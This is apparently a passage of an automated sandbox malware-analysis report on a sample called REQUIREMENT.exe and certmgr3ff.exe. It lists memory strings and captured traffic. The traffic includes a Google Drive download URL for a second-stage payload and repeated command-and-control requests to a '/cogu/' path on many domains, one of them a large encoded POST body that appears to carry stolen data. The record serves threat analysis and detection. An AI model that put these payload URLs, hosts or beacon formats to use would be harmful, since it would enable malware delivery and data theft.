Source: certmgr3ff.exe, 0000001C.00000002.35818481696.00000000007D8000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13
Source: REQUIREMENT.exe, 00000003.00000003.32850629558.00000000009AD000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13CEplGBbrpSmmZ_Evs
Source: certmgr3ff.exe, 0000001A.00000003.35629055759.00000000008C3000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13om
Source: certmgr3ff.exe, 0000001C.00000002.35818883054.0000000000826000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13t
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13xw
Source: explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000009.00000000.32941779484.00000000111A2000.00000004.00000001.sdmp	String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: DB1.17.dr	String found in binary or memory: https://login.live.com/
Source: systray.exe, 0000000D.00000002.37530371735.0000000002AA7000.00000004.00000020.sdmp, DB1.17.dr	String found in binary or memory: https://login.live.com//
Source: DB1.17.dr	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: systray.exe, 0000000D.00000002.37530371735.0000000002AA7000.00000004.00000020.sdmp, DB1.17.dr	String found in binary or memory: https://login.live.com/v104
Source: explorer.exe, 00000009.00000000.32893898674.0000000010F10000.00000004.00000001.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000009.00000000.32882465556.000000000D5C5000.00000004.00000001.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	String found in binary or memory: https://word.office.comcaS
Source: explorer.exe, 00000009.00000000.33223566168.0000000003925000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000000.32942173512.00000000112AB000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000009.00000000.32873010204.0000000009BDF000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehpLMEM
Source: explorer.exe, 00000009.00000000.32942173512.00000000112AB000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.nazfoodstuff.com
Source: systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png

Source: unknown

HTTP traffic detected: POST /cogu/ HTTP/1.1Host: www.tpmionline.comConnection: closeContent-Length: 131140Cache-Control: no-cacheOrigin: http://www.tpmionline.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tpmionline.com/cogu/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 45 36 3d 66 37 4e 43 71 33 70 65 49 4f 6c 69 50 33 6e 34 71 78 5a 6b 64 6f 59 35 48 64 4a 72 38 69 42 4f 53 4e 4b 6b 37 4b 7e 67 59 5f 71 59 6e 6b 44 51 6f 2d 44 63 45 5f 47 6d 73 79 42 70 63 33 6e 43 45 59 73 58 4c 66 50 73 73 4f 41 68 65 53 58 32 4e 54 71 69 31 50 37 4d 44 65 6e 63 7e 69 41 69 31 50 61 57 69 65 42 39 58 51 7e 54 71 68 6c 46 55 4f 74 37 33 59 76 4b 30 4d 62 4e 43 6b 45 79 6a 4a 6c 36 7e 38 75 42 37 34 65 4f 52 6e 59 30 46 4d 58 5f 44 50 69 68 55 78 63 6a 6b 49 6f 57 7e 72 6d 31 47 57 75 62 51 70 42 42 45 7a 64 72 7a 67 4a 5f 37 62 6e 43 58 53 69 4e 4a 36 76 71 39 61 39 59 31 4e 31 63 59 56 7e 65 72 4d 30 74 28 54 36 57 45 6d 6e 4b 49 2d 6b 56 36 64 53 49 78 4f 53 46 54 48 55 4e 42 54 6a 38 6e 6d 77 44 32 72 46 63 34 53 57 44 33 6f 38 57 72 35 72 69 34 74 43 62 31 6c 56 38 72 52 6e 5f 30 47 77 65 6e 41 68 5a 42 71 6d 76 47 36 6d 4c 64 58 6c 71 53 69 77 52 54 4f 75 39 65 76 50 39 4d 74 5a 59 30 45 72 4a 64 53 45 32 44 45 43 59 54 74 64 48 71 41 49 41 37 77 5a 48 34 46 33 47 79 71 44 30 52 62 4a 4d 33 6d 61 56 33 4d 54 76 4c 44 47 4c 41 70 6a 47 6f 63 59 50 4a 2d 67 6a 52 4c 59 5f 70 35 46 51 28 5a 30 4f 59 33 34 38 68 41 56 53 55 37 63 77 30 48 71 70 56 44 5a 31 4c 5f 45 34 6a 76 53 4d 6c 4d 68 64 70 30 6d 6f 6f 4c 43 56 31 39 36 38 78 78 59 39 4d 55 28 46 58 78 7e 56 42 6c 39 4e 64 49 6c 6e 42 58 6e 7a 30 6f 58 68 62 79 4a 6e 44 76 66 77 72 72 37 78 6f 63 47 41 71 39 53 67 37 2d 5a 78 73 41 57 6d 28 56 6a 48 49 55 37 30 75 56 6a 39 48 53 7e 59 32 31 64 48 67 64 45 61 39 56 34 61 58 58 39 44 6c 43 63 58 46 69 38 35 4d 32 38 6a 4f 45 72 4f 44 72 52 39 4b 4d 49 55 47 32 45 4a 31 77 72 39 58 42 46 58 58 4d 7e 37 6e 63 36 53 7e 6f 53 39 45 5a 65 74 47 39 6c 31 33 31 5a 55 71 65 44 43 42 65 39 56 74 54 36 75 75 66 41 78 66 78 52 34 51 73 65 31 42 45 66 6b 56 47 51 62 4d 54 75 78 6c 59 6d 5f 71 59 44 4b 36 51 33 76 7e 35 5a 37 38 4d 39 51 4f 5a 36 7a 4e 2d 47 37 4a 78 71 59 44 6e 75 73 77 4d 42 37 37 58 69 41 57 74 78 71 47 31 74 6b 6e 72 69 45 58 4b 77 39 6c 50 61 34 69 66 6f 68 69 4f 45 67 6f 35 6e 4a 51 52 5a 57 70 43 4f 32 6c 70 70 63 47 4a 75 61 49 41 66 6a 57 78 43 50 75 4b 31 73 5a 4d 4f 47 65 39 53 75 4f 7a 37 4a 50 58 48 4f 74 74 77 6a 43 52 50 74 37 44 46 75 28 47 59 49 4d 34 32 68 68 66 36 2d 64 75 36 6e 7e 4a 78 47 32 79 70 66 61 6a 48 30 34 36 75 49 63 7a 64 57 7a 54 4e 70 4f 78 61 69 48 4e 41 58 67 38 47 68 6a 70 41 6f 28 5a 73 35 28 6c 31 73 4a 72 6a 67 4f 76 50 31 39 63 76 50 59 50 34 32 61 43 59 59 51 32 57 78 62 33 67 48 47 37 46 31 70 77 4b 33 71 50 67 35 64 6e 7a 55 59 7a 76 72 57 73 7e 6e 7a 57 50 69 67 4e 68 56 46

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra59sspsgplogf893q75230rnc/1634132775000/18281895610876391208/*/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-7g-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
Source: global traffic	HTTP traffic detected: GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-60-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e%3Ddownload&hash=ne1ffd4kaaa27pue6e32mldfstfdqasf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
Source: global traffic	HTTP traffic detected: GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download&nonce=r167qul5841hi&user=04225796272126474013Z&hash=htm37s8j60l12inv0q761u8k5rdo7ceb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0o-60-docs.googleusercontent.comCookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9_nonce=r167qul5841hi
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
Source: global traffic	HTTP traffic detected: GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-60-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9=04225796272126474013Z\|1634133075000\|cco6hf5p2hi2d6l67mrd596u1prmvso4
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
Source: global traffic	HTTP traffic detected: GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-60-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9=04225796272126474013Z\|1634133075000\|cco6hf5p2hi2d6l67mrd596u1prmvso4
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC HTTP/1.1Host: www.hkautobox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC HTTP/1.1Host: www.taichan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC HTTP/1.1Host: www.bestofnapa.guideConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC HTTP/1.1Host: www.bqgfk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=RrpHjQu0LYHaKA/4jQL7YSE8Zlpf0+V6RMywmZjWIXP7087B5zoOXLZv/c2UnXWK/cWX&EVpdF=D6AlWhC HTTP/1.1Host: www.mobileiranian2.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC HTTP/1.1Host: www.soymilk-design.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2 HTTP/1.1Host: www.jkwhitleyphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.boliden-ab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ HTTP/1.1Host: www.jachaljuega.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr HTTP/1.1Host: www.ceruleden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP HTTP/1.1Host: www.centralcontable.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F HTTP/1.1Host: www.marvellouslles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF HTTP/1.1Host: www.alo360.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF HTTP/1.1Host: www.nu12.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF HTTP/1.1Host: www.researchlearningspirit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF HTTP/1.1Host: www.xn--4pvw92bcry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF HTTP/1.1Host: www.cinargeridonusum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1Host: www.domainair.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1Host: www.nazfoodstuff.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC HTTP/1.1Host: www.cacaolixir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC HTTP/1.1Host: www.fishermandm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC HTTP/1.1Host: www.high-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC HTTP/1.1Host: www.tpmionline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.shopsharpgraphics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.uprisehealthmonitoring.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.estudio-me.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi HTTP/1.1Host: www.i8news-de.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
